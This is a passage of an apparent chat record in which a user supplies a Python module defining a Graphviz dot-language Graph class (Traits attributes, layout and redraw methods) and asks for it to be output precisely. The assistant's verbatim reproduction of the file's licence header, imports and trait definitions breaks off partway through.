fdp accepts <html:a rel=\"attr\">overlap</html:a> with an integer\n # prefix followed by a colon, specifying the number of tries. If there is\n # no prefix, no initial tries will be performed. If there is nothing following\n # a colon, none of the above methods will be attempted. By default, fdp\n # uses <html:code>overlap=\"9:portho\"</html:code>. Note that <html:code>overlap=\"true\"</html:code>,\n # <html:code>overlap=\"0:true\"</html:code> and <html:code>overlap=\"0:\"</html:code> all turn off all overlap\n # removal.\n #\n # Except for the Voronoi method, all of these transforms preserve the\n # orthogonal ordering of the original layout. That is, if the x coordinates\n # of two nodes are originally the same, they will remain the same, and if\n # the x coordinate of one node is originally less than the x coordinate of\n # another, this relation will still hold in the transformed layout. The\n # similar properties hold for the y coordinates.\n # This is not quite true for the \"porth*\" cases. For these, orthogonal\n # ordering is only preserved among nodes related by an edge.\n #\n # <html:b>NOTE</html:b>The methods <html:span class=\"val\">orthoxy</html:span> and <html:span class=\"val\">orthoyx</html:span> are still evolving. The semantics of these may change, or these methods may disappear altogether.\n overlap = Enum(\"True\", \"False\", \"scale\", \"scalexy\", \"prism\", \"compress\",\n \"vpsc\", \"ipsep\", desc=\"determines if and how node overlaps should be \"\n \"removed\", graphviz=True)\n\n # This is true if the value of pack is \"true\" or a non-negative integer.\n # If true, each connected component of the graph is laid out separately,\n # and then the graphs are packed tightly. If pack has an integral value,\n # this is used as the size, in points, of a margin around each part;\n # otherwise, a default margin of 8 is used. If pack is interpreted as\n # false, the entire graph is laid out together. The granularity and method\n # of packing is influenced by the packmode attribute.\n #\n # For layouts which always do packing, such a twopi, the pack attribute is\n # just used to set the margin.\n pack = Bool(graphviz=True) #Either(\n# Bool, Int, desc=\"If true, each connected component of the graph is \"\n# \"laid out separately, and then the graphs are packed tightly\"\n# )\n\n # This indicates the granularity and method used for packing\n # (cf. <html:a rel=\"type\">packMode</html:a>). Note that defining\n # <html:a rel=\"attr\">packmode</html:a> will automatically turn on packing as though one had\n # set <html:code>pack=true</html:code>.\n #\n # \"node\",\"clust\",\"graph\" These specify the granularity of packing connected\n # components when the pack attribute is true. A value of \"node\" causes\n # packing at the node and edge label, with no overlapping of these objects.\n # This produces a layout with the least area, but it also allows\n # interleaving, where a node of one component may lie between two nodes in\n # another component. A value of \"graph\" does a packing using the bounding\n # box of the component. Thus, there will be a rectangular region around a\n # component free of elements of any other component. A value of \"clust\"\n # guarantees that top-level clusters are kept intact. What effect a value\n # has also depends on the layout algorithm. For example, neato does not\n # support clusters, so a value of \"clust\" will have the same effect as the\n # default \"node\" value.\n packmode = Enum(\"node\", \"cluster\", \"graph\", label=\"Pack mode\",\n desc=\"granularity and method used for packing\", graphviz=True)\n\n # The pad attribute specifies how much, in inches, to extend the\n # drawing area around the minimal area needed to draw the graph.\n # If the pad is a single double, both the x and y pad values are set\n # equal to the given value. This area is part of the\n # drawing and will be filled with the background color, if appropriate.\n #\n # Normally, a small pad is used for aesthetic reasons, especially when\n # a background color is used, to avoid having nodes and edges abutting\n # the boundary of the drawn region.\n pad = Float(0.0555, desc=\"how much to extend the drawing area around the \"\n \"minimal area needed to draw the graph\", graphviz=True)\n\n # Width and height of output pages, in inches. If this is set and is\n # smaller than the size of the layout, a rectangular array of pages of the\n # specified page size is overlaid on the layout, with origins aligned in\n # the lower-left corner, thereby partitioning the layout into pages. The\n # pages are then produced one at a time, in pagedir order.\n #\n # At present, this only works for PostScript output. For other types of\n # output, one should use another tool to split the output into multiple\n # output files. Or use the viewport to generate multiple files.\n page = pointf_trait\n\n # If the <html:a rel=\"attr\">page</html:a> attribute is set and applicable,\n # this attribute specifies the order in which the pages are emitted.\n # This is limited to one of the 8 row or column major orders.\n pagedir = Enum(\"BL\", \"BR\", \"TL\", \"TR\", \"RB\", \"RT\", \"LB\", \"LT\",\n desc=\"If the page attribute is set and applicable, this attribute \"\n \"specifies the order in which the pages are emitted\",\n label=\"Page direction\", graphviz=True)\n\n # If <html:a rel=\"attr\">quantum</html:a> > 0.0, node label dimensions\n # will be rounded to integral multiples of the quantum.\n quantum = Float(0.0, desc=\"If quantum > 0.0, node label dimensions will \"\n \"be rounded to integral multiples of the quantum.\", graphviz=True)\n\n # Sets direction of graph layout. For example, if <html:a rel=\"attr\">rankdir</html:a>=\"LR\",\n # and barring cycles, an edge <html:code>T -> H;</html:code> will go\n # from left to right. By default, graphs are laid out from top to bottom.\n rankdir = Enum(\"TB\", \"LR\", \"BT\", \"RL\", desc=\"direction of graph layout\",\n label=\"Rank direction\", graphviz=True)\n\n # In dot, this gives the desired rank separation, in inches. This is\n # the minimum vertical distance between the bottom of the nodes in one\n # rank and the tops of nodes in the next. If the value\n # contains \"equally\", the centers of all ranks are spaced equally apart.\n # Note that both\n # settings are possible, e.g., ranksep = \"1.2 equally\".\n # In twopi, specifies radial separation of concentric circles.\n ranksep = Float(0.5, desc=\"In dot, this gives the desired rank \"\n \"separation. In twopi, specifies radial separation of concentric \"\n \"circles\", label=\"Rank separation\", graphviz=True)\n\n # Sets the aspect ratio (drawing height/drawing width) for the drawing.\n # Note that this is adjusted before the size attribute constraints are\n # enforced.\n #\n # If ratio is numeric, it is taken as the desired aspect ratio. Then, if\n # the actual aspect ratio is less than the desired ratio, the drawing\n # height is scaled up to achieve the desired ratio; if the actual ratio is\n # greater than that desired ratio, the drawing width is scaled up.\n #\n # If ratio = \"fill\" and the size attribute is set, node positions are\n # scaled, separately in both x and y, so that the final drawing exactly\n # fills the specified size.\n #\n # If ratio = \"compress\" and the size attribute is set, dot attempts to\n # compress the initial layout to fit in the given size. This achieves a\n # tighter packing of nodes but reduces the balance and symmetry. This\n # feature only works in dot.\n #\n # If ratio = \"expand\", the size attribute is set, and both the width and\n # the height of the graph are less than the value in size, node positions\n # are scaled uniformly until at least one dimension fits size exactly.\n # Note that this is distinct from using size as the desired size, as here\n # the drawing is expanded before edges are generated and all node and text\n # sizes remain unchanged.\n #\n # If ratio = \"auto\", the page attribute is set and the graph cannot be\n # drawn on a single page, then size is set to an ``ideal'' value. In\n # particular, the size in a given dimension will be the smallest integral\n # multiple of the page size in that dimension which is at least half the\n # current size. The two dimensions are then scaled independently to the new\n # size. This feature only works in dot.\n# ratio = Either(Float, Enum(\"fill\", \"compress\", \"expand\", \"auto\"),\n ratio = Enum(\"fill\", \"compress\", \"expand\", \"auto\",\n desc=\"aspect ratio (drawing height/drawing width) for the drawing\",\n graphviz=True)\n\n # If true and there are multiple clusters, run cross minimization a second\n # time.\n remincross = Bool(False, desc=\"If true and there are multiple clusters, \"\n \"run cross minimization a second\", label=\"Re-cross minimization\",\n graphviz=True)\n\n # This is a synonym for the <html:a rel=\"attr\">dpi</html:a> attribute.\n resolution = Alias(\"dpi\", desc=\"a synonym for the dpi attribute\",\n graphviz=True)\n\n # This specifies nodes to be used as the center of the\n # layout and the root of the generated spanning tree. As a graph attribute,\n # this gives the name of the node. As a node attribute (circo only), it\n # specifies that the node should be used as a central node. In twopi,\n # this will actually be the central node. In circo, the block containing\n # the node will be central in the drawing of its connected component.\n # If not defined,\n # twopi will pick a most central node, and circo will pick a random node.\n root = root_trait\n\n # If 90, set drawing orientation to landscape.\n rotate = Range(0, 360, desc=\"drawing orientation\", graphviz=True)\n\n # During network simplex, maximum number of edges with negative cut values\n # to search when looking for one with minimum cut value.\n searchsize = Int(30, desc=\"maximum number of edges with negative cut \"\n \"values to search when looking for one with minimum cut value\",\n label=\"Search size\", graphviz=True)\n\n # Fraction to increase polygons (multiply\n # coordinates by 1 + sep) for purposes of determining overlap. Guarantees\n # a minimal non-zero distance between nodes.\n # If unset but <html:a rel=\"attr\">esep</html:a> is defined, <html:a rel=\"attr\">sep</html:a> will be\n # set to <html:code>esep/0.8</html:code>. If <html:a rel=\"attr\">esep</html:a> is unset, the default value\n # is used.\n #\n # When <html:a rel=\"attr\">overlap</html:a>=\"ipsep\" or \"vpsc\",\n # <html:a rel=\"attr\">sep</html:a> gives a minimum distance, in inches, to be left between nodes.\n # In this case, if <html:a rel=\"attr\">sep</html:a> is a pointf, the x and y separations can be\n # specified separately.\n sep = Int(4, desc=\"Fraction to increase polygons (multiply coordinates by \"\n \"1 + sep) for purposes of determining overlap\", label=\"Separation\",\n graphviz=True)\n\n # Print guide boxes in PostScript at the beginning of\n # routesplines if 1, or at the end if 2. (Debugging)\n showboxes = showboxes_trait\n\n # Maximum width and height of drawing, in inches.\n # If defined and the drawing is too large, the drawing is uniformly\n # scaled down so that it fits within the given size.\n #\n # If <html:a rel=\"attr\">size</html:a> ends in an exclamation point (<html:tt>!</html:tt>),\n # then it is taken to be\n # the desired size. In this case, if both dimensions of the drawing are\n # less than <html:a rel=\"attr\">size</html:a>, the drawing is scaled up uniformly until at\n # least one dimension equals its dimension in <html:a rel=\"attr\">size</html:a>.\n #\n # Note that there is some interaction between the <html:a rel=\"attr\">size</html:a> and\n # <html:a rel=\"attr\">ratio</html:a> attributes.\n size = pointf_trait\n\n # Controls how, and if, edges are represented. If true, edges are drawn as\n # splines routed around nodes; if false, edges are drawn as line segments.\n # If set to \"\", no edges are drawn at all.\n #\n # (1 March 2007) The values <html:span class=\"val\">line</html:span> and <html:span class=\"val\">spline</html:span> can be\n # used as synonyms for <html:span class=\"val\">false</html:span> and <html:span class=\"val\">true</html:span>, respectively.\n # In addition, the value <html:span class=\"val\">polyline</html:span> specifies that edges should be\n # drawn as polylines.\n #\n # By default, the attribute is unset. How this is interpreted depends on\n # the layout. For dot, the default is to draw edges as splines. For all\n # other layouts, the default is to draw edges as line segments. Note that\n # for these latter layouts, if <html:code>splines=\"true\"</html:code>, this\n # requires non-overlapping nodes (cf. <html:a rel=\"attr\">overlap</html:a>).\n # If fdp is used for layout and <html:tt>splines=\"compound\"</html:tt>, then the edges are\n # drawn to avoid clusters as well as nodes.\n splines = Enum(\"True\", \"False\", \"\",\n desc=\"how, and if, edges are represented\", graphviz=True)\n\n # Parameter used to determine the initial layout of nodes. If unset, the\n # nodes are randomly placed in a unit square with\n # the same seed is always used for the random number generator, so the\n # initial placement is repeatable.\n #\n #\n # has the syntax [style][seed].\n #\n # If style is present, it must be one of the strings \"regular\", \"self\", or\n # \"random\". In the first case, the nodes are placed regularly about a\n # circle. In the second case, an abbreviated version of neato is run to\n # obtain the initial layout. In the last case, the nodes are placed\n # randomly in a unit square.\n #\n # If seed is present, it specifies a seed for the random number generator.\n # If seed is a positive number, this is used as the seed. If it is anything\n # else, the current time, and possibly the process id, is used to pick a\n # seed, thereby making the choice more random. In this case, the seed value\n # is stored in the graph.\n #\n # If the value is just \"random\", a time-based seed is chosen.\n #\n # Note that input positions, specified by a node's pos attribute, are only\n # used when the style is \"random\".\n start = start_trait\n\n # A URL or pathname specifying an XML style sheet, used in SVG output.\n stylesheet = Str(desc=\"URL or pathname specifying an XML style sheet\",\n label=\"Style sheet\", graphviz=True)\n\n # If the object has a URL, this attribute determines which window\n # of the browser is used for the URL.\n # See <html:a href=\"http://www.w3.org/TR/html401/present/frames.html#adef-target\">W3C documentation</html:a>.\n target = target_trait\n\n # If set explicitly to true or false, the value determines whether or not\n # internal bitmap rendering relies on a truecolor color model or uses\n # a color palette.\n # If the attribute is unset, truecolor is not used\n # unless there is a <html:a rel=\"attr\">shapefile</html:a> property\n # for some node in the graph.\n # The output model will use the input model when possible.\n #\n # Use of color palettes results in less memory usage during creation of the\n # bitmaps and smaller output files.\n #\n # Usually, the only time it is necessary to specify the truetype model\n # is if the graph uses more than 256 colors.\n # However, if one uses <html:a rel=\"attr\">bgcolor</html:a>=transparent with\n # a color palette, font\n # antialiasing can show up as a fuzzy white area around characters.\n # Using <html:a rel=\"attr\">truecolor</html:a>=true avoids this problem.\n truecolor = Bool(True, desc=\"bitmap rendering relies on a truecolor color \"\n \"model or uses a color palette\", graphviz=True)\n\n # Hyperlinks incorporated into device-dependent output.\n # At present, used in ps2, cmap, i*map and svg formats.\n # For all these formats, URLs can be attached to nodes, edges and\n # clusters. URL attributes can also be attached to the root graph in ps2,\n # cmap and i*map formats. This serves as the base URL for relative URLs in the\n # former, and as the default image map file in the latter.\n #\n # For svg, cmapx and imap output, the active area for a node is its\n # visible image.\n # For example, an unfilled node with no drawn boundary will only be active on its label.\n # For other output, the active area is its bounding box.\n # The active area for a cluster is its bounding box.\n # For edges, the active areas are small circles where the edge contacts its head\n # and tail nodes. In addition, for svg, cmapx and imap, the active area\n # includes a thin polygon approximating the edge. The circles may\n # overlap the related node, and the edge URL dominates.\n # If the edge has a label, this will also be active.\n # Finally, if the edge has a head or tail label, this will also be active.\n #\n # Note that, for edges, the attributes <html:a rel=\"attr\">headURL</html:a>,\n # <html:a rel=\"attr\">tailURL</html:a>, <html:a rel=\"attr\">labelURL</html:a> and\n # <html:a rel=\"attr\">edgeURL</html:a> allow control of various parts of an\n # edge. Also note that, if active areas of two edges overlap, it is unspecified\n # which area dominates.\n URL = Str(desc=\"hyperlinks incorporated into device-dependent output\",\n label=\"URL\", graphviz=True)\n\n # Clipping window on final drawing.\n #\n # \"%lf,%lf,%lf,%lf,%lf\" or \"%lf,%lf,%lf,\"%s\"\"\n #\n # The viewPort W,H,Z,x,y or W,H,Z,N specifies a viewport for the final\n # image. The pair (W,H) gives the dimensions (width and height) of the\n # final image, in points. The optional Z is the zoom factor, i.e., the\n # image in the original layout will be W/Z by H/Z points in size. By\n # default, Z is 1. The optional last part is either a pair (x,y) giving a\n # position in the original layout of the graph, in points, of the center of\n # the viewport, or the name N of a node whose center should used as the\n # focus. By default, the focus is the center of the graph bounding box,\n # i.e., (bbx/2,bby/2), where \"bbx,bby\" is the value of the bounding box\n # attribute bb.\n #\n # Sample values: 50,50,.5,'2.8 BSD' or 100,100,2,450,300. The first will\n # take the 100x100 point square centered on the node 2.8 BSD and scale it\n # down by 0.5, yielding a 50x50 point final image.\n viewport = Tuple(Float, Float, Float, Float, Float, graphviz=True)\n# Either(\n# Tuple(Float, Float, Float, Float, Float),\n# Tuple(Float, Float, Float, Str),\n# desc=\"clipping window on final drawing\"\n# )\n\n voro_margin = Float(0.05, desc=\"Factor to scale up drawing to allow \"\n \"margin for expansion in Voronoi technique. dim' = (1+2*margin)*dim.\",\n label=\"Voronoi margin\", graphviz=True)\n\n\n# def _defaultdist_default(self):\n# \"\"\" Trait initialiser \"\"\"\n#\n# return 1+(avg. len)*math.sqrt(|V|)\n\n #--------------------------------------------------------------------------\n # Views:\n #--------------------------------------------------------------------------\n\n traits_view = tabbed_view\n# traits_view = graph_view\n\n #--------------------------------------------------------------------------\n # \"object\" interface:\n #--------------------------------------------------------------------------\n\n def __init__(self, *args, **kw_args):\n \"\"\" Initialises the graph.\n \"\"\"\n super(Graph, self).__init__(*args, **kw_args)\n\n # Listen for the addition or removal of nodes and update each branch's\n # list of available nodes so that they can move themselves.\n self.on_trait_change(self._on_nodes, \"subgraphs*.nodes\")\n self.on_trait_change(self._on_nodes, \"subgraphs*.nodes_items\")\n\n # Listen for the addition of edges and check that the heado_node and\n # tail_node instances exist in the graph or any subgraphs.\n self.on_trait_change(self._on_edges, \"subgraphs*.edges\")\n self.on_trait_change(self._on_edges, \"subgraphs*.edges_items\")\n\n\n def __str__(self):\n \"\"\" Returns a string representation of the graph in dot language. It\n will return the graph and all its subelements in string form.\n \"\"\"\n s = \"\"\n if self.strict:\n s += \"strict \"\n\n if self.directed:\n s += \"digraph\"\n else:\n s += \"graph\"\n\n return \"%s %s\" % ( s, super(Graph, self).__str__() )\n\n #--------------------------------------------------------------------------\n # Public interface:\n #--------------------------------------------------------------------------\n\n @on_trait_change(\"arrange\")\n def arrange_all(self):\n \"\"\" Sets for the _draw_ and _ldraw_ attributes for each of the graph\n sub-elements by processing the xdot format of the graph.\n \"\"\"\n import godot.dot_data_parser\n\n parser = godot.dot_data_parser.GodotDataParser()\n\n xdot_data = self.create( format = \"xdot\" )\n# print \"GRAPH DOT:\\n\", str( self )\n# print \"XDOT DATA:\\n\", xdot_data\n\n parser.dotparser.parseWithTabs()\n ndata = xdot_data.replace( \"\\\\\\n\", \"\" )\n tokens = parser.dotparser.parseString( ndata )[0]\n parser.build_graph( graph=self, tokens=tokens[3] )\n\n self.redraw_canvas()\n\n\n @on_trait_change(\"redraw\")\n def redraw_canvas(self):\n \"\"\" Parses the Xdot attributes of all graph components and adds\n the components to a new canvas.\n \"\"\"\n from xdot_parser import XdotAttrParser\n\n xdot_parser = XdotAttrParser()\n canvas = self._component_default()\n\n for node in self.nodes:\n components = xdot_parser.parse_xdot_data( node._draw_ )\n canvas.add( *components )\n\n components = xdot_parser.parse_xdot_data( node._ldraw_ )\n canvas.add( *components )\n\n for edge in self.edges:\n components = xdot_parser.parse_xdot_data( edge._draw_ )\n canvas.add( *components )\n components = xdot_parser.parse_xdot_data( edge._ldraw_ )\n canvas.add( *components )\n components = xdot_parser.parse_xdot_data( edge._hdraw_ )\n canvas.add( *components )\n components = xdot_parser.parse_xdot_data( edge._tdraw_ )\n canvas.add( *components )\n components = xdot_parser.parse_xdot_data( edge._hldraw_ )\n canvas.add( *components )\n components = xdot_parser.parse_xdot_data( edge._tldraw_ )\n canvas.add( *components )\n\n self.component = canvas\n self.vp.request_redraw()\n\n\n def get_node(self, ID):\n \"\"\" Returns a node given an ID or None if no such node exists.\n \"\"\"\n node = super(Graph, self).get_node(ID)\n if node is not None:\n return node\n\n for graph in self.all_graphs:\n for each_node in graph.nodes:\n if each_node.ID == ID:\n return each_node\n else:\n return None\n\n\n# def write(self, path, prog=None, format=None):\n# \"\"\" Writes a graph to a file.\n#\n# Given a filename 'path' it will open/create and truncate\n# such file and write on it a representation of the graph\n# defined by the dot object and in the format specified by\n# 'format'.\n# The format 'raw' is used to dump the string representation\n# of the Dot object, without further processing.\n# The output can be processed by any of graphviz tools, defined\n# in 'prog', which defaults to 'dot'\n# Returns True or False according to the success of the write\n# operation.\n# \"\"\"\n#\n# if prog is None:\n# prog = self.program\n#\n# if format is None:\n# format = self.format\n#\n#\n# dot_fd = None\n# try:\n# dot_fd = open( path, \"wb\" )\n## dot_fd = file( path, \"w+b\" )\n# if format == 'raw':\n# dot_fd.write( self.to_string() )\n# else:\n# dot_fd.write( self.create( prog, format ) )\n# finally:\n# if dot_fd is not None:\n# dot_fd.close()\n#\n# return True\n\n #--------------------------------------------------------------------------\n # Trait initialisers:\n #--------------------------------------------------------------------------\n\n def _component_default(self):\n \"\"\" Trait initialiser. Overrides the base class to use a Canvas\n for the root Graph.\n \"\"\"\n return Canvas( draw_axes=True, bgcolor=\"lightsteelblue\")\n\n\n def _epsilon_default(self):\n \"\"\" Trait initialiser.\n \"\"\"\n if self.mode == \"KK\":\n return 0.0001 * len(self.nodes)\n else:\n return 0.0001\n\n\n def _maxiter_default(self):\n \"\"\" Trait initialiser.\n \"\"\"\n mode = self.mode\n if mode == \"KK\":\n return 100 * len(self.nodes)\n elif mode == \"major\":\n return 200\n else:\n return 600\n\n #--------------------------------------------------------------------------\n # Property getters:\n #--------------------------------------------------------------------------\n\n def _get_all_graphs(self):\n \"\"\" Property getter.\n \"\"\"\n top_graph = self\n\n def get_subgraphs(graph):\n assert isinstance(graph, BaseGraph)\n subgraphs = graph.subgraphs[:]\n for subgraph in graph.subgraphs:\n subsubgraphs = get_subgraphs(subgraph)\n subgraphs.extend(subsubgraphs)\n return subgraphs\n\n subgraphs = get_subgraphs(top_graph)\n return [top_graph] + subgraphs\n\n #--------------------------------------------------------------------------\n # Event handlers:\n #--------------------------------------------------------------------------\n\n def _directed_changed(self, new):\n \"\"\" Sets the connection string for all edges.\n \"\"\"\n if new:\n conn = \"->\"\n else:\n conn = \"--\"\n\n for edge in [e for g in self.all_graphs for e in g.edges]:\n edge.conn = conn\n\n\n def _on_nodes(self):\n \"\"\" Maintains each branch's list of available nodes in order that they\n may move themselves (InstanceEditor values).\n \"\"\"\n all_graphs = self.all_graphs\n all_nodes = [n for g in all_graphs for n in g.nodes]\n\n for graph in all_graphs:\n for edge in graph.edges:\n edge._nodes = all_nodes\n\n\n def _on_edges(self, object, name, old, new):\n \"\"\" Handles the list of edges for any graph changing.\n \"\"\"\n if name == \"edges_items\":\n edges = new.added\n elif name == \"edges\":\n edges = new\n else:\n edges = []\n\n all_nodes = [n for g in self.all_graphs for n in g.nodes]\n\n for each_edge in edges:\n # Ensure the edge's nodes exist in the graph.\n if each_edge.tail_node not in all_nodes:\n object.nodes.append( each_edge.tail_node )\n\n if each_edge.head_node not in all_nodes:\n object.nodes.append( each_edge.head_node )\n\n # Initialise the edge's list of available nodes.\n each_edge._nodes = all_nodes\n\n\n# def _bgcolor_changed(self, new):\n# \"\"\" Handles the canvas background colour.\n# \"\"\"\n# self.canvas.bgcolor = new\n\n#------------------------------------------------------------------------------\n# Stand-alone call:\n#------------------------------------------------------------------------------\n\nif __name__ == \"__main__\":\n import sys\n logger = logging.getLogger()\n logger.addHandler(logging.StreamHandler(sys.stdout))\n logger.setLevel(logging.DEBUG)\n\n# from godot.graph import Graph\n\n graph = Graph(ID=\"Foo\", directed=True, label=\"Foo Graph\")\n\n node1 = Node(\"node1\", label=\"Node 1\", shape=\"rectangle\")\n graph.add_node( node1 )\n\n node2 = Node(\"node2\", label=\"Node 2\")\n graph.add_node( node2 )\n\n graph.add_edge(node1, node2)\n\n\n# subgraph1 = Subgraph(ID=\"subgraph1\", rank=\"min\")\n# subgraph1.nodes.append(Node(\"node3\", label=\"Node 3\"))\n# graph.subgraphs.append(subgraph1)\n#\n# subgraph2 = Subgraph(ID=\"subgraph2\", rank=\"max\")\n# subgraph2.nodes.append(Node(\"node4\", label=\"Node 4\"))\n# subgraph1.subgraphs.append(subgraph2)\n\n# from godot.component.component_viewer import ComponentViewer\n# viewer = ComponentViewer(component=graph.component)\n# viewer.configure_traits()\n\n# graph.write(\"/tmp/graph.xdot\", \"dot\", \"xdot\")\n\n# graph.arrange_all()\n\n# print write_dot_graph(graph)\n\n graph.configure_traits()\n\n# EOF +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n```\nOutput it precisely.",
"role": "user"
}
] |
[
{
"content": "Here is the code block:\n<|memory_start|>```python\n#------------------------------------------------------------------------------\n# Copyright (c) 2009 Richard W. Lincoln\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to\n# deal in the Software without restriction, including without limitation the\n# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or\n# sell copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\n# IN THE SOFTWARE.\n#------------------------------------------------------------------------------\n\n\"\"\" Defines a representation of a graph in Graphviz's dot language.\n\"\"\"\n\n#------------------------------------------------------------------------------\n# Imports:\n#------------------------------------------------------------------------------\n\nimport os\nimport subprocess\nimport tempfile\nimport math\nimport logging\n\nfrom enthought.traits.api import \\\n HasTraits, Any, Instance, Trait, Tuple, Bool, Str, Enum, Float, Color, \\\n Either, Range, Int, Font, List, Directory, ListInstance, This, Property, \\\n Dict, on_trait_change\n\nfrom enthought.traits.trait_handlers import TraitListEvent\n\nfrom enthought.traits.ui.api import View, Group, Item, Tabbed\nfrom enthought.pyface.image_resource import ImageResource\nfrom enthought.enable.api import Canvas, Viewport, Container\nfrom enthought.enable.tools.api import ViewportPanTool, ViewportZoomTool\nfrom enthought.enable.component_editor import ComponentEditor\n\nfrom common import \\\n Alias, color_scheme_trait, rectangle_trait, fontcolor_trait, \\\n fontname_trait, fontsize_trait, label_trait, point_trait, pointf_trait, \\\n nojustify_trait, root_trait, showboxes_trait, target_trait, margin_trait\n\nfrom godot.base_graph import BaseGraph\nfrom godot.node import Node\nfrom godot.edge import Edge\nfrom godot.subgraph import Subgraph\nfrom godot.cluster import Cluster\n\nfrom godot.ui.graph_view import graph_view, tabbed_view\n\n#------------------------------------------------------------------------------\n# Logging:\n#------------------------------------------------------------------------------\n\nlogger = logging.getLogger(__name__)\n\n#------------------------------------------------------------------------------\n# Trait definitions:\n#------------------------------------------------------------------------------\n\ncluster_mode_trait = Enum(\n \"local\", \"global\", \"none\", desc=\"mode used for handling clusters\",\n label=\"Cluster rank\", graphviz=True\n)\n\nstart_trait = Enum(\"regular\", \"self\", \"random\", graphviz=True)\n\n#------------------------------------------------------------------------------\n# \"Graph\" class:\n#------------------------------------------------------------------------------\n\nclass Graph(BaseGraph):\n \"\"\" Defines a representation of a graph in Graphviz's dot language.\n \"\"\"\n\n #--------------------------------------------------------------------------\n # Trait definitions.\n #--------------------------------------------------------------------------\n\n # A strict graph is an unweighted, undirected graph containing no\n # graph loops or multiple edges.\n strict = Bool(False, desc=\"A strict graph is an unweighted, \"\n \"undirected graph containing no graph loops or multiple edges.\" )\n\n # Do edges have direction?\n directed = Bool(False, desc=\"directed edges.\")\n\n # All graphs, subgraphs and clusters.\n all_graphs = Property( List(Instance(BaseGraph)) )\n\n #--------------------------------------------------------------------------\n # Dot trait definitions.\n #--------------------------------------------------------------------------\n\n # Bounding box of drawing in integer points.\n bb = rectangle_trait\n\n # When attached to the root graph, this color is used as the background for\n # entire canvas. When a cluster attribute, it is used as the initial\n # background for the cluster. If a cluster has a filled\n # <html:a rel=\"attr\">style</html:a>, the\n # cluster's <html:a rel=\"attr\">fillcolor</html:a> will overlay the\n # background color.\n #\n # If no background color is specified for the root graph, no graphics\n # operation are performed on the background. This works fine for\n # PostScript but for bitmap output, all bits are initialized to something.\n # This means that when the bitmap output is included in some other\n # document, all of the bits within the bitmap's bounding box will be\n # set, overwriting whatever color or graphics where already on the page.\n # If this effect is not desired, and you only want to set bits explicitly\n # assigned in drawing the graph, set <html:a rel=\"attr\">bgcolor</html:a>=\"transparent\".\n bgcolor = Color(\"white\", desc=\"color used as the background for the \"\n \"entire canvas\", label=\"Background Color\", graphviz=True)\n\n # If true, the drawing is centered in the output canvas.\n center = Bool(False, desc=\"is drawing centered in the output canvas\",\n graphviz=True)\n\n # Specifies the character encoding used when interpreting string input\n # as a text label. The default value is <html:span class=\"val\">UTF-8</html:span>.\n # The other legal value is <html:span class=\"val\">iso-8859-1</html:span> or,\n # equivalently,\n # <html:span class=\"val\">Latin1</html:span>. The <html:a rel=\"attr\">charset</html:a> attribute is case-insensitive.\n # Note that if the character encoding used in the input does not\n # match the <html:a rel=\"attr\">charset</html:a> value, the resulting output may be very strange.\n charset = Str(\"UTF-8\", label=\"Character encoding\", graphviz=True)\n\n # Mode used for handling clusters. If <html:a rel=\"attr\">clusterrank</html:a> is <html:span class=\"val\">local</html:span>, a\n # subgraph whose name begins with \"cluster\" is given special treatment.\n # The subgraph is laid out separately, and then integrated as a unit into\n # its parent graph, with a bounding rectangle drawn about it.\n # If the cluster has a <html:a rel=\"attr\">label</html:a> parameter, this label\n # is displayed within the rectangle.\n # Note also that there can be clusters within clusters.\n # At present, the modes <html:span class=\"val\">global</html:span> and <html:span class=\"val\">none</html:span>\n # appear to be identical, both turning off the special cluster processing.\n clusterrank = cluster_mode_trait\n\n # This attribute specifies a color scheme namespace. If defined, it specifies\n # the context for interpreting color names. In particular, if a\n # <html:a rel=\"type\">color</html:a> value has form <html:code>xxx</html:code> or <html:code>//xxx</html:code>,\n # then the color <html:code>xxx</html:code> will be evaluated according to the current color scheme.\n # If no color scheme is set, the standard X11 naming is used.\n # For example, if <html:code>colorscheme=bugn9</html:code>, then <html:code>color=7</html:code>\n # is interpreted as <html:code>/bugn9/7</html:code>.\n colorscheme = color_scheme_trait\n\n # Comments are inserted into output. Device-dependent.\n comment = Str(desc=\"comments are inserted into output\", graphviz=True)\n\n # If <html:span class=\"val\">true</html:span>, allow edges between clusters.\n # (See <html:a rel=\"attr\">lhead</html:a> and <html:a rel=\"attr\">ltail</html:a> below.)\n compound = Bool(False, desc=\"edges allowed between clusters\",\n graphviz=True)\n\n # If <html:span class=\"val\">true</html:span>, use edge concentrators.\n concentrate = Bool(False, desc=\"edge concentrators\", graphviz=True)\n\n # Factor damping force motions. On each iteration, a nodes movement\n # is limited to this factor of its potential motion. By being less than\n # 1.0, the system tends to \"cool\", thereby preventing cycling.\n Damping = Float(0.99, desc=\"factor damping force motions\", graphviz=True)\n\n # This specifies the distance between nodes in separate connected\n # components. If set too small, connected components may overlap.\n # Only applicable if <html:a rel=\"attr\">pack</html:a>=false.\n defaultdist = Float(desc=\"distance between nodes in separate connected \"\n \"components\", label=\"Default distance\", graphviz=True)\n\n # Set the number of dimensions used for the layout. The maximum value\n # allowed is 10.\n dim = Range(low=2, high=10, desc=\"number of dimensions for the layout\",\n label=\"Dimensions\", graphviz=True)\n\n # Only valid when mode=\"ipsep\". If true, constraints are generated for each\n # edge in the largest (heuristic) directed acyclic subgraph such that the\n # edge must point downwards. If \"hier\", generates level constraints similar\n # to those used with mode=\"hier\". The main difference is that, in the\n # latter case, only these constraints are involved, so a faster solver can\n # be used.\n diredgeconstraints = Enum(True, \"heir\", label=\"Edge constraints\",\n graphviz=True)\n\n # This specifies the expected number of pixels per inch on a display device.\n # For bitmap output, this guarantees that text rendering will be\n # done more accurately, both in size and in placement. For SVG output,\n # it is used to guarantee that the dimensions in the output correspond to\n # the correct number of points or 